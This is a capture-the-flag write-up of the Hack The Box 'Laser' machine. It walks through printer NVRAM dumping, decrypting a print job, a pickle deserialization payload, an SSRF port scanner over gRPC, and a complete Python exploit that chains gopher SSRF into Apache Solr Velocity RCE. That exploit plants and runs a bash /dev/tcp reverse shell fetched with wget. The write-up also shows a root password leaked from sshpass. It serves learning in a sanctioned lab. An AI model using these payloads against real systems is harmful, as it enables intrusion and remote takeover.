Hack The Box - Laser Writeup
Laser is an Insane-tier vulnerable Linux virtual machine, created by MrR3boot & r4j.
The goal of my participation in Hack The Box is to learn which tools are used for analysis and exploitation of a variety of protocols, and how to use them efficiently. A side goal is to be exposed to unfamiliar software.
Summary
| | |
| --- | --- |
| Name | Laser |
| Creators | MrR3boot & r4j |
| IP Address | 10.10.10.201 |
| OS | Linux |
| Release Date | 2020-08-08 |
| Retirement Date | 2020-12-19 |
| Difficulty | Insane (50 points) |
Firstly, we discover that printers are vulnerable, and decrypt a secret. Afterwards, we learn about protocol buffers, and break into a vulnerable internal service using an SSRF issue. Lastly, we stumble into a container thanks to a race condition, and redirect a cronjob to operate as root on the host, instead of within the container.
I enjoyed the foothold stage of this box the most - which is rare for me!
Initial Reconnaissance
Running nmap
First thing, as always, I'll add the machine to /etc/hosts, and run nmap.
> nmap -T4 laser.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-xx-xx xx:xx XXXX
Nmap scan report for laser.htb (10.10.10.201)
Host is up (0.019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
9000/tcp open cslistener
9100/tcp open jetdirect
Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds
In this case, the quickest scan reveals all accessible ports. Ignoring SSH, the service guesses for the other two ports look like they may not be telling the full story. Let's look them up in the IANA database.
- 9000 - CSListener (not very interesting)
- 9100 - Printer PDL Data Stream (...)
Port 9100 is... a printer!
Let's go break into the printer. Sounds like a lot of fun, actually.
Your Printer Is Vulnerable
Researching Printer Attacks
The first recent item that turns up in Google for hacking printers is the Printer Exploitation Toolkit (PRET).
It supports multiple printer languages, among them PostScript (PS) and Printer Job Language (PJL). PJL is the one that connects successfully on port 9100.
From reading some documentation, it appears as though I can dump NVRAM on the printer.
Information disclosure | Memory access | PJL | PRET command: nvram dump
After performing the dump (output below), it is clear that this laser "printer" has nvram, and that the nvram contains a secret key.
Finding The Key
> ~/packages/PRET/pret.py laser.htb pjl
________________
_/_______________/|
/___________/___//|| PRET | Printer Exploitation Toolkit v0.40
|=== |----| || by Jens Mueller <jens.a.mueller@rub.de>
| | ô| ||
|___________| ô| ||
| ||/.´---.|| | || 「 pentesting tool that made
|-||/_____\||-. | |´ dumpster diving obsolete‥ 」
|_||=L==H==||_|__|/
(ASCII art by
Jan Foerster)
Connection to laser.htb established
Device: LaserCorp LaserJet 4ML
Welcome to the pret shell. Type help or ? to list commands.
laser.htb:/> nvram
NVRAM operations: nvram <operation>
nvram dump [all] - Dump (all) NVRAM to local file.
nvram read addr - Read single byte from address.
nvram write addr value - Write single byte to address.
laser.htb:/> nvram dump
Writing copy to nvram/laser.htb
....................--[[snip]]--......................................
.....................................k...e....y.....13vu94r6..643rv19u
laser.htb:/>
I have no idea what those dots represent, so let's examine the "copy" at nvram/laser.htb.
> hexdump -C nvram/laser.htb
0000 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e |................|
--[[snip]]--
0440 2e 2e 6b 2e 2e 2e 65 2e 2e 2e 2e 79 2e 2e 2e 2e |..k...e....y....|
0450 2e 31 33 76 75 39 34 72 36 2e 2e 36 34 33 72 76 |.13vu94r6..643rv|
0460 31 39 75 |19u|
0463
The dots are literal 0x2e ('.') filler bytes - nothing special, it would appear. The key, however, looks useful.
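As a convenience, the key material can also be pulled out of the dump programmatically. A small hypothetical helper, assuming everything other than the key is 0x2e filler (as the hexdump suggests):

# Hypothetical helper: drop the 0x2e ('.') filler from the NVRAM dump,
# leaving the key material visible. Assumes the snipped regions are filler too.
with open('nvram/laser.htb', 'rb') as f:
    data = f.read()

print(bytes(b for b in data if b != 0x2e).decode(errors='replace'))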
Printers Have Filesystems
There is also a filesystem! PRET allows you to dump all of the files (which is just one file) with a single mirror command.
laser.htb:/> mirror
Creating mirror of /
Traversing pjl/
Traversing pjl/jobs/
0:/pjl/jobs/queued -> /home/simon/packages/PRET/mirror/laser.htb/0/pjl/jobs/queued
172199 bytes received.
This file starts with a b' and ends with a '^M...
Strip those, and base64 decoding succeeds.
Note: that's Python bytes-literal ("binary string") syntax. We may be looking at some Python scripts later on?
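For reference, a minimal sketch of that clean-up in Python, assuming the mirrored file sits at the path PRET printed above and that the b'...' wrapper is the only decoration:

import base64

# Assumed path - adjust to wherever PRET wrote its mirror
with open('mirror/laser.htb/0/pjl/jobs/queued', 'rb') as f:
    raw = f.read().strip()

# Strip the leading b' and the trailing ' (the ^M carriage return goes with strip()),
# then base64-decode what remains (removeprefix/removesuffix need Python 3.9+)
inner = raw.removeprefix(b"b'").removesuffix(b"'")
decoded = base64.b64decode(inner)

with open('queued-decoded', 'wb') as f:
    f.write(decoded)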
In enumeration, I also find a reference to AES:
laser.htb:/> info variables
--[[snip]]--
LPARM:ENCRYPTION MODE=AES [CBC]
The "key" is the right 128-bit length for an AES-CBC-128 cipher... But where is the IV?
Decryption Woes
openssl expects the key in hexadecimal, so the ASCII key needs converting:
31337675393472363634337276313975
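A quick sanity check of the conversion and the key length:

# Sanity check: the hex above is just the ASCII key, byte for byte
print("13vu94r6643rv19u".encode().hex())   # 31337675393472363634337276313975
print(len("13vu94r6643rv19u") * 8)         # 128 bits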
> openssl enc -d -aes-128-cbc -in queued-decoded -out queued-fin -K 31337675393472363634337276313975 -iv 0
139703284073728:error:0606506D:digital envelope routines:EVP_DecryptFinal_ex:wrong final block length:../crypto/evp/evp_enc.c:572:
What is this error about block length?
It turns out the file's length isn't divisible by 16 bytes (128 bits) - it's 8 bytes too long...
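A one-liner confirms the misalignment (assuming the decoded file is still named queued-decoded):

import os
# Expect a remainder of 8 - the file is 8 bytes past a block boundary
print(os.path.getsize('queued-decoded') % 16)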
After messing about with removing the LAST 8 bytes and brute-forcing random IVs over a few million decryption attempts, I found nothing.
I also modified PRET to scan up to index 1000000 of the NVRAM, instead of stopping at 65535; the server's responses looped over the same 0-65535 space, so no luck finding the IV there.
Some Hours Later...
Finding The Correct Bytes
So, I eventually removed the FIRST eight bytes of the file instead, and tried iv = 0 again.
And I received as output a file that looks like a PDF! Of course, printers and PDF documents go hand in hand...
> tail -c +9 queued-decoded > queued-shortened
> openssl enc -d -aes-128-cbc -in queued-shortened -out queued-fin -K 31337675393472363634337276313975 -iv 0
> head queued-fin
M7%PDF-1.4
%
1 0 obj
<</Creator (Mozilla/5.0 \(Windows NT 10.0; Win64; x64\) AppleWebKit/537.36 \(KHTML, like Gecko\) Typora/0.9.86 Chrome/76.0.3809.146 Electron/6.1.4 Safari/537.36)
/Producer (Skia/PDF m76)
/CreationDate (D:20200629084907+00'00')
/ModDate (D:20200629084907+00'00')>>
endobj
3 0 obj
<</ca 1
Editor's Note: The 16 bytes after the first 8 bytes were, in fact, the correct IV. It just so happens that leaving the IV in place as the first 128-bit block of the input, while setting the IV to 0 for the decryption, allows the decryption to succeed.
This is because, in CBC mode, each block is decrypted using the previous ciphertext block as its IV - so a wrong IV only garbles the first 16 bytes of output, and every later block comes out clean.
Lesson learnt - if an IV of length n is required, try the first n bytes of the file.
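Put together, the whole decryption can be sketched in a few lines of Python with pycryptodome, assuming the layout really is 8 junk bytes, then the 16-byte IV, then the ciphertext:

from Crypto.Cipher import AES  # pycryptodome

KEY = b'13vu94r6643rv19u'  # the key recovered from NVRAM

with open('queued-decoded', 'rb') as f:
    blob = f.read()

# Assumed layout: 8 junk bytes, then a 16-byte IV, then the CBC ciphertext
iv, ciphertext = blob[8:24], blob[24:]
plaintext = AES.new(KEY, AES.MODE_CBC, iv).decrypt(ciphertext)

with open('decrypted.pdf', 'wb') as f:  # hypothetical output name
    f.write(plaintext)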
After removing 16 more bytes from the decrypted file, up to the magic bytes "%PDF"...
> tail -c +17 queued-fin > feed-engine.pdf
We can read a description of the service on port 9000, delivered below in text form!
Shifting To Port 9000
What Is Feed Engine?
Feed Engine v1.0
(Progress Update : 18-06-2020)
Description
Used to parse the feeds from various sources (Printers, Network devices, Web servers and other connected devices). These feeds can be used in checking load balancing, health status, tracing.
Usage
To streamline the process we are utilising the Protocol Buffers and gRPC framework.
The engine runs on 9000 port by default. All devices should submit the feeds in serialized format such that data transmission is fast and accurate across network.
We defined a Print service which has a RPC method called Feed . This method takes Content as input parameter and returns Data from the server.
The Content message definition specifies a field data and Data message definition specifies a field feed .
On successful data transmission you should see a message.
...
return service_pb2.Data(feed='Pushing feeds')
...
Here is how a sample feed information looks like.
{
"version": "v1.0",
"title": "Printer Feed",
"home_page_url": "http://printer.laserinternal.htb/",
"feed_url": "http://printer.laserinternal.htb/feeds.json",
"items": [
{
"id": "2",
"content_text": "Queue jobs"
},
{
"id": "1",
"content_text": "Failed items"
}
]
}
QA with Clients
Gabriel (Client) : What optimisation measures you've taken ?
Victor (Product Manager) : This is main aspect where we completely relied on gRPC framework which has low latency, highly scalable and language independent.
John (Client) : What measures you take while processing the serialized feeds ?
Adam (Senior Developer) : Well, we placed controls on what gets unpickled. We don't use builtins and any other modules.
Release Info
Currently we are working on v1.0 with basic feature which includes rendering feeds on dashboard.
Bugs
1. Error handling in _InactiveRPCError
2. Connection timeout issues
3. Forking issues
4. Issue raised by clients in last update
Todo
1. Fork support to increase efficiency for more clients
2. Data delivery in more formats
3. Dashboard design and some data analytics
4. Merge staging core to feed engine
Obviously the protocol notes are important, but I am also introduced to two potential usernames:
- Adam (most likely), and
- Victor.
Not to mention the internal domain laserinternal.htb!
Researching gRPC
After reading up on gRPC a little, I found a description of how to create the 'service', 'method', and 'messages' that were described in the PDF.
We defined a Print service which has a RPC method called Feed . This method takes Content as input parameter and returns Data from the server.
The Content message definition specifies a field data and Data message definition specifies a field feed .
I built a few variants of the seemingly required .proto file, after finding a GUI tool called bloomrpc for testing a gRPC service. It was helpful to have a tool that spit out useful errors when my file was not parseable, showed me the intended structure of a message definition, and gave me the terms to look up in the PDF's description.
A few mistakes I made while structuring this file were:
- using a package line without realising it was optional,
- defining a service and method without the message types, and
- incorrect capitalisation.
I eventually had a successful proto file! I thought this would take longer.
syntax = "proto2";
message Content {
required string data = 1;
}
message Data {
required string feed = 1;
}
service Print {
rpc Feed(Content) returns (Data) {}
}
The speed at which this was accomplished implies that a Google protocol is simple and elegant, which is surely not the case. I will have to do further research in order to become frustrated with the byzantine complexity which I am convinced gRPC must have, despite minor evidence to the contrary.
Exploring the gRPC server
Moving on.
Submitting a {"data":"Hello"}
message to the service with this file returned the following error:
{
"error": "2 UNKNOWN: Exception calling application: Invalid base64-encoded string: number of data characters (21) cannot be 1 more than a multiple of 4"
}
Alright, let's encode.
> echo "hello" | base64
aGVsbG8K
After trying out a base64 encoded payload, I had another interesting error message:
{
"error": "2 UNKNOWN: Exception calling application: A load persistent id instruction was encountered,\nbut no persistent_load function was specified."
}
Googling the message led me to references to unpickling in Python. So, it appears that I need to find a vulnerability in their unpickling!
The PDF shows a JSON sample of some "feed" data, which I assume is pickled as input? It doesn't look like output.
To Pickle, Or Not To Pickle
Generating A gRPC Client
I used the Python gRPC instructions to generate a client and server from the proto file.
> sudo apt install python3-grpcio
> mkdir client; cd client
> python3 -m grpc_tools.protoc -I../ --python_out=. --grpc_python_out=. ../print.proto
Then, I started scripting in a separate file "print.py" in the same directory.
import print_pb2, print_pb2_grpc, grpc, sys

# Open an insecure channel to the remote service and call the Feed RPC
# with whatever string was passed on the command line
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = print_pb2_grpc.PrintStub(channel)
response = stub.Feed(print_pb2.Content(data=sys.argv[1]))
print(response)
This is enough to query the service from code. After experimenting with payloads from the command line, I added some adjustments along the lines of some reference articles on unpickling vulnerabilities.
Evil gRPC Client
import print_pb2, print_pb2_grpc, grpc, sys
import base64, pickle

class Exploit(object):
    def __reduce__(self):
        return (eval, ('eval(compile("import os;os.system(\\"ls\\")","q","exec"))',))

shellcodeClass = pickle.dumps(Exploit())

def run(pickle):
    channel = grpc.insecure_channel('10.10.10.201:9000')
    stub = print_pb2_grpc.PrintStub(channel)
    response = stub.Feed(print_pb2.Content(data=pickle))
    print(response)

if len(sys.argv) > 1:
    if "-c" in sys.argv[1]:
        print("Exploit class")
        print(shellcodeClass)
        run(base64.b64encode(shellcodeClass).decode('ascii'))
    else:
        print("Custom arg")
        run(sys.argv[1])
Now that I have a useful custom client, it is much easier to experiment with unpickling.
> python3 print.py -c
Exploit class
b'c__builtin__\neval\np0\n(Veval(compile("import os;os.system(\\u005c"ls\\u005c")","q","exec"))\np1\ntp2\nRp3\n.'
Traceback (most recent call last):
File "print.py", line 43, in <module>
run(base64.b64encode(shellcodeClass).decode('ascii'))
File "print.py", line 36, in run
response = stub.Feed(print_pb2.Content(data=pickle))
File "/usr/lib/python3/dist-packages/grpc/_channel.py", line 826, in __call__
return _end_unary_response_blocking(state, call, False, None)
File "/usr/lib/python3/dist-packages/grpc/_channel.py", line 729, in _end_unary_response_blocking
raise _InactiveRpcError(state)
grpc._channel._InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNKNOWN
details = "Exception calling application: 'Module is disabled'"
debug_error_string = "{"created":"@160xxxxxxx.679946436","description":"Error received from peer ipv4:10.10.10.201:9000","file":"src/core/lib/surface/call.cc","file_line":1055,"grpc_message":"Exception calling application: 'Module is disabled'","grpc_status":2}"
>
I tried a few unpickling possibilities using sys.*, os.*, open, and other functions, including functions from Python's builtins. The consistent error message is Exception calling application: 'Module is disabled'.
I was not successful in finding a path to RCE that doesn't require a module. This was foreshadowed in the PDF, of course.
Adam (Senior Developer) : Well, we placed controls on what gets unpickled. We don't use builtins and any other modules.
Let's Try Something Different
Submitting JSON
Turns out, the JSON data structure in the PDF is the input, and it is useful to send it in! There is a request made to whichever URL you place in the feed_url parameter upon submission :)
#!/usr/bin/env python3
import base64, pickle
import print_pb2, print_pb2_grpc, grpc

sample = """{
"feed_url": "http://10.10.14.25:8000/feeds.json",
}"""

channel = grpc.insecure_channel('10.10.10.201:9000')

def run(pickle):
    stub = print_pb2_grpc.PrintStub(channel)
    response = stub.Feed(print_pb2.Content(data=pickle))
    print(response)

pickled = pickle.dumps(sample)
run(base64.b64encode(pickled).decode('ascii'))
The data has to be sent as a JSON string and not as a dict, or the following error message is sent.
Exception calling application: the JSON object must be str, bytes or bytearray, not dict
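My reading of that error: the service unpickles the payload and then passes the result to json.loads(), which accepts strings (or bytes) but not dicts. A small sketch of the difference:

import json, pickle

feed = {"feed_url": "http://10.10.14.25:8000/feeds.json"}

bad = pickle.dumps(feed)               # unpickles to a dict -> json.loads() complains
good = pickle.dumps(json.dumps(feed))  # unpickles to a JSON string -> accepted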
The user agent of the request is FeedBot v1.0. A quick search reveals that this is meaningless.
An Error Prompts Understanding
While banging against this brick wall, I noticed that there is an error returned when the connection is refused by the remote host:
Traceback (most recent call last):
[...snip...]
File "/usr/lib/python3/dist-packages/grpc/_channel.py", line 729, in _end_unary_response_blocking
raise _InactiveRpcError(state)
grpc._channel._InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNKNOWN
details = "Exception calling application: (7, 'Failed to connect to 10.10.14.25 port 8000: Connection refused')"
debug_error_string = "{"created":"@160xxxxxxx.062819068","description":"Error received from peer ipv4:10.10.10.201:9000","file":"src/core/lib/surface/call.cc","file_line":1055,"grpc_message":"Exception calling application: (7, 'Failed to connect to 10.10.14.25 port 8000: Connection refused')","grpc_status":2}"
Fun fact about that error code #7... It looks like an error that curl might produce!
> curl http://10.10.14.25:8000/fsdfs
curl: (7) Failed to connect to 10.10.14.25 port 8000: Connection refused
Based on the usage of curl, I might be able to use some gopher:// trickery (as learnt from the Travel box) to get an internal SSRF going.
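The rough idea, if I have the gopher URL format right: curl discards the first character after the slash as the gopher item type, and sends everything after it to the target port verbatim, so an entire raw HTTP request can be smuggled through. A purely hypothetical sketch:

import urllib.parse

# Hypothetical: a raw HTTP request, URL-encoded into a gopher:// URL.
# The leading '_' is a throwaway gopher item-type character.
raw_request = ('_POST /some/internal/endpoint HTTP/1.1\r\n'
               'Host: localhost:80\r\n'
               'Connection: close\r\n'
               'Content-Length: 2\r\n\r\n'
               '{}')
print('gopher://localhost:80/' + urllib.parse.quote(raw_request))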
It's Arm Day At The Gym
Using Curls To Scan Ports
To figure out a worthwhile target within the box, I'll need to do some port scanning.
I wrote a script based on print.py for this purpose.
#!/usr/bin/env python3
import base64, pickle
import print_pb2, print_pb2_grpc, grpc

sample = """{
"feed_url": "http://localhost:%d/",
}"""

channel = grpc.insecure_channel('10.10.10.201:9000')

def run(pickle):
    stub = print_pb2_grpc.PrintStub(channel)
    response = stub.Feed(print_pb2.Content(data=pickle))

print("Scanning ports:")
for port in range(1,65535):
    try:
        pickled = pickle.dumps(sample % (port))
        run(base64.b64encode(pickled).decode('ascii'))
        print("\n** Port {} open\n".format(port))
    except Exception as err:
        if "Connection refused" in err.details():
            print("Port {} closed".format(port), end='\r')
        else:
            print("Port {} returned strange error:".format(port), err.details())
Running this produces a few numbers after some minutes have passed:
SSRF Port Scanner Results
> python3 portscan.py
Scanning ports:
Port 22 returned strange error: Exception calling application: (1, 'Received HTTP/0.9 when not allowed\n')
Port 7983 returned strange error: Exception calling application: (52, 'Empty reply from server')
** Port 8983 open
Port 9000 returned strange error: Exception calling application: (1, 'Received HTTP/0.9 when not allowed\n')
Port 9100 returned strange error: Exception calling application: (1, 'Received HTTP/0.9 when not allowed\n')
** Port 45017 open
As far as IANA cares, 45017 is unassigned.
7983 is interesting, but 8983 stands out.
Port 8983 Is Open
So, what would run on port 8983?
IANA registered for: Apache Solr 1.4
Let's see what issues might be present!
> searchsploit solr
------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------ ---------------------------------
Apache Solr - Remote Code Execution via V | multiple/remote/48338.rb
Apache Solr 7.0.1 - XML External Entity E | xml/webapps/43009.txt
Apache Solr 8.2.0 - Remote Code Execution | java/webapps/47572.py
Solr 3.5.0 - Arbitrary Data Deletion | java/webapps/39418.txt
------------------------------------------ ---------------------------------
Shellcodes: No Results
Two recent RCE modules? I'm spoilt!
Blind Man's SSRF
Analysing Solr RCE
I'll take a look at the Python exploit source code, located in the following path on Kali Linux.
/usr/share/exploitdb/exploits/java/webapps/47572.py
Looks like it creates a "node" and executes some code on it.
Editor's Note: it is in fact modifying a setting on an existing "node", and then exploiting an issue made possible by the setting
It doesn't appear that I can directly use this script, due to the write-only nature of the SSRF.
Since I am blind (no response data), I can't check the version of the server. Let's assume that I can use this exploit for now. If I'm wrong, I can try harder!
Analysing the requests generated by the exploit-db script shows that only two are required:
- The first request goes to /solr/{node}/config with some JSON POST data, in order to modify a template setting.
- The second request goes to /solr/{node}/select as a GET request, with a lot of Java directed at the template, wrapping a payload to be executed by the host OS shell.
So, being blind, how do I find the correct node name?
Finding The Core Name
First, let's try doing the fancy requests using some keywords from the PDF.
dashboard, core, feedengine, feed-engine, engine, feed, staging, source, sources, data, analytics
It appears that I receive the same "successful" responses to requests regardless of the name. Oh well...
Hang on. The exploit in Solr involves "nodes", but there are also references to "cores" in the Solr documentation...
There's a line in the PDF related to this:
4. Merge staging core to feed engine
I think I know the name!
Solr Exploit Through gRPC
Based on that likely core name, I spent a while writing a blind exploit script for Apache Solr, built around the two requests listed in the exploit-db script.
#!/usr/bin/env python3
# run a revshell locally on port 4444 to grab a connection

# for host's IP address
import netifaces as ni
# for serving http
from http.server import HTTPServer, SimpleHTTPRequestHandler
import threading, os
# for pickling and packet sending
import urllib.parse
import base64, pickle
import print_pb2, print_pb2_grpc, grpc

# Grab the local IP address for revshell purposes
interface = [i for i in ni.interfaces() if 'tun' in i][0]
ipaddress = str(ni.ifaddresses(interface)[ni.AF_INET][0]['addr'])

with open('ex.sh', 'w') as revshell:
    revshell.writelines(['#!/usr/bin/env bash\n',
                         'bash -i >& /dev/tcp/{}/4444 0>&1\n'.format(ipaddress)])

# Exploit commands
stage1 = 'wget {}:9200/ex.sh -O /tmp/ex.sh'.format(ipaddress)
stage2 = 'bash /tmp/ex.sh'

# Run a HTTP server in the current directory, in a new thread
def start_server(path, port):
    '''Start a simple webserver serving path on port'''
    os.chdir(path)
    httpd = HTTPServer(('', port), SimpleHTTPRequestHandler)
    httpd.serve_forever()

daemon = threading.Thread(name='daemon_server',
                          target=start_server,
                          args=('.', 9200))
daemon.setDaemon(True) # Set as a daemon, will die with the main thread.
daemon.start()

# Exploit wrappers
sample = """{{
"feed_url": "{}://localhost:8983/{}"
}}"""

# Exploit enabling command (content-length = 218 + 2 for the \r\n at the end)
nodeconf = ('0POST /solr/staging/config HTTP/1.1\r\n'
            'Host: localhost:8983\r\n'
            'Connection: close\r\n'
            'Content-Length: 220\r\n\r\n'
            '{"update-queryresponsewriter": {'
            '"startup": "lazy", '
            '"name": "velocity", '
            '"class": "solr.VelocityResponseWriter", '
            '"template.base.dir": "", '
            '"solr.resource.loader.enabled": "true", '
            '"params.resource.loader.enabled": "true"'
            '}}')

# Return a wrapper request for executing shell command
def exploit(cmd):
    return ("solr/staging/select?q=1&&wt=velocity&v.template=custom&v.template.custom="
            "%23set($x=%27%27)+"
            "%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+"
            "%23set($chr=$x.class.forName(%27java.lang.Character%27))+"
            "%23set($str=$x.class.forName(%27java.lang.String%27))+"
            "%23set($ex=$rt.getRuntime().exec(%27" + urllib.parse.quote(cmd, safe='') +
            "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+"
            "%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end")

# Calling the gRPC method
channel = grpc.insecure_channel('10.10.10.201:9000')

def run(pickle):
    stub = print_pb2_grpc.PrintStub(channel)
    response = stub.Feed(print_pb2.Content(data=pickle))

# Attempt exploit sequence
try:
    nodepickled = pickle.dumps(sample.format('gopher', urllib.parse.quote(nodeconf)))
    run(base64.b64encode(nodepickled).decode())
    exploitpickled = pickle.dumps(sample.format('http', exploit(stage1)))
    run(base64.b64encode(exploitpickled).decode())
    exploitpickled = pickle.dumps(sample.format('http', exploit(stage2)))
    run(base64.b64encode(exploitpickled).decode())
    print('It may have worked...')
except Exception as err:
    if 'Connection refused' in err.details():
        print('Port closed?')
    else:
        print('Solr returned strange error:', err.details())
        print(err)
This iteration of the script finally worked!
> nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.83] from laser.htb [10.10.10.201] 50594
bash: cannot set terminal process group (1088): Inappropriate ioctl for device
bash: no job control in this shell
solr@laser:/opt/solr/server$
Some issues I encountered while iterating on it:
- I initially generated the first request using curl. The Connection: close header was required for the first request, and was not present in the curl output. The exploit hangs silently without it.
- I wasn't able to directly execute a pipe-based reverse shell. nc did not appear to be available.
Editor's Note: nc was available, and in the PATH. However, it was a version without the -e parameter!
solr@laser:/opt/solr/server$ nc 10.10.14.83 3333 -e /bin/bash
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
The multi-stage payload was the simplest solution I could think of to bypass any execution issues.
Solr Eclipsed
We Have user.txt
I am now done with Apache Solr, and I have the ability to read the flag at /home/solr/user.txt!
No users named Adam or Victor are found on the system. From here, it's time for some internal recon.
There are three Solr directories: /opt/solr, /var/solr and /home/solr.
As a point of interest, I found the feed engine application in the /home/solr/feed_engine directory.
I sent this back to the attacking host and had a read of the code. It was nice to see I didn't miss anything obvious while exploiting it.
Other than that, my filesystem enumeration was not fruitful; there was little else of interest visible to me on the host.
Cron-ic Fatigue
However, during further enumeration, I found some interesting activity, repeating every 10 seconds, in the following (abbreviated) pspy report.
It's often worth running pspy, as any interesting recurrent process will show up in the listing over time.
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270238 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/graphql-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270239 | scp /opt/updates/files/graphql-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:34 CMD: UID=105 PID=2270242 | sshd: [net]
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270241 | sshd: [accepted]
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270257 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/apiv2-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270258 | scp /opt/updates/files/apiv2-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270260 | /usr/sbin/sshd -R
2020/xx/xx xx:48:34 CMD: UID=105 PID=2270261 | sshd: [net]
2020/xx/xx xx:48:34 CMD: UID=??? PID=2270263 | ???
2020/xx/xx xx:48:34 CMD: UID=??? PID=2270262 | ???
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270277 | scp /opt/updates/files/jenkins-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270276 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/jenkins-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270279 | /usr/sbin/sshd -R
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270282 | run-parts --lsbsysinit /etc/update-motd.d
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270295 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/dashboard-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270296 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/dashboard-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270298 | /usr/sbin/sshd -R
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270301 | run-parts --lsbsysinit /etc/update-motd.d
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270315 | scp /opt/updates/files/bug-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270314 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/bug-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270317 | /usr/sbin/sshd -R
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270321 |
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270336 | scp /opt/updates/files/postgres-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270335 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/postgres-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270338 | /usr/sbin/sshd -R
2020/xx/xx xx:48:35 CMD: UID=105 PID=2270339 | sshd: root [net]
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270354 | sleep 10
There are enough mentions of containers in other sections of the process log that I suspect 172.18.0.2 to be a container. Annoyingly, the "password" of zzz's is ineffective - however, I now know that this container exists. I'll hang around and wait to see some more cron jobs.
We quickly spot the Apache Solr exploit being undone every few minutes! Sneaky :)
2020/xx/xx xx:51:02 CMD: UID=0 PID=2272286 | curl -i -s -k -X POST -H Host: localhost:8983 -H Content-Type: application/json --data { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "false", "params.resource.loader.enabled": "false" }} http://localhost:8983/solr/staging/config
2020/xx/xx xx:51:02 CMD: UID=0 PID=2272291 | curl -i -s -k -X POST -H Host: localhost:8983 -H Content-Type: application/json --data { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "false", "params.resource.loader.enabled": "false" }} http://localhost:8983/solr/development/config
There is also a mention of a script, by the name of '/tmp/clear.sh':
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281078 | scp /root/clear.sh root@172.18.0.2:/tmp/clear.sh
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281112 | ssh root@172.18.0.2 /tmp/clear.sh
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281111 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 /tmp/clear.sh
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281130 | ssh root@172.18.0.2 rm /tmp/clear.sh
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281129 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 rm /tmp/clear.sh
Not sure what is going on here as far as copying and removing this script over and over...
Hurry, Cover It With Zzz's!
Race Condition In sshpass
Eventually, I notice a slightly more realistic-looking password appear in the logs:
2020/xx/xx xx:53:39 CMD: UID=0 PID=2274073 | sshpass -p c413d115b3d87664499624e7826d8c5a scp /opt/updates/files/bug-feed root@172.18.0.2:/root/feeds/
I think this may be unintended, will circle back to find another route later.
Editor's Note: This appears to have been the intended route. sshpass is insecure and cannot fully protect against the race condition demonstrated above; it attempts to scrub the password from the process arguments, but does not always succeed before monitoring or logging tools see it. Use keys, not command-line passwords!
